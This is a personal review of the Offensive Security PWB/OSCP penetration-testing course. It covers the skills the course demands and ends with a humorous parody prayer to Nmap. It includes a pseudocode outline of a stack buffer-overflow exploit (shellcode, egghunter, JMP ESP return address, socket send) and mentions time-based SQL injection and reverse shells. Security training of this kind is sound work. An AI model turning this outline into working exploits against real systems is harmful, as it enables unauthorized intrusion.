I took the PWB and that was a wild ride!
Lots of stuff covered in the screencasts; the same and some more in the course pdf.
This is not for the feint-hearted, though, and you need to have some developingskills in order to keep with the speed (aka $End_of_lab_time – NOW()) as the labs really are the key.
- Developers mindset: there is not enough time in the labs to teach you basic programming pragmatics, but you certainly can learn this upfront and you should. Don’t think you can learn do this within 60 days if your biggest experience with a PC is Word and browsing Reddit.
- Linux skills. You really need to learn the CLI, (file)permissions, Environment, compiling of c and c++ thus also gcc
- shellscripting (Bash, but you can use any language you want with a shebang line)
- Python, a lot of exploits are written in the same style:
//shellcode in a var (with possibly an egghunter-tag)
//optionally some egghunter code
//a certain amount of chars as the buffer to overflow on target
//the ret address in the OS, JMP ESP into a var
// socket.send(buffer + returnaddress + shellcode)
or if there’s a need for an egghunter:
// socket.send(shellcode + (buffer-len(shellcode)) + returnaddress + egghunter)
You need to be comfortable with Python, it’s indenting and tweaking exploit for other platforms and you’ll be creating tools of your own. I sometimes jumped the gun though, rapidly created some shellscript, when the course explained the working for Nmap, to create logging/reports for each host while be able to scan whole subnets, only to find out about PBNJ in the next chapter.
- Perl, almost the same as above.
- Reporting. You need to document everything, not only for the customer, but also to find attack vectors and connections wchih you would have not seen otherwise.
- Patience. Seriously. You have to be able to enumerate, enumerate, catalog data and enumerate some more. And if you have found a time-based mysqlinjection which is only reliable with a sleep of 5 seconds, you will want a reverse shell a.s.a.p, trust me.
But this is why the course’s credo is “Try Harder”.
The course taught me a lot and they did this in a fun way:
- Explain concept
- Practical approach to lab on target X
- “Now you try on Target Y. Hint: blabla”
- spend hours and hours to spot the difference and look for that tiny subtle thing
- r00t! And never forget
This really worked for me and I certainly won’t forget the stuff I learned the hard way.
Now for those doing the OSCP course:
Our Nmap who is in /usr/bin/,
Hallowed be thy enumeration,
Your scans will come,
your PBNJ reporting will be done,
on kali, as it is in backtrack 5.
Give us this day our holy apt-get upgrade,
and forgive us our network tresspasses,
as we punish those who trespass against us,
and lead us not into temptation of the power of Nessus,
but deliver us our Wireshark logs.
For thine is the reporting,
and the scanning, and root for ever and ever.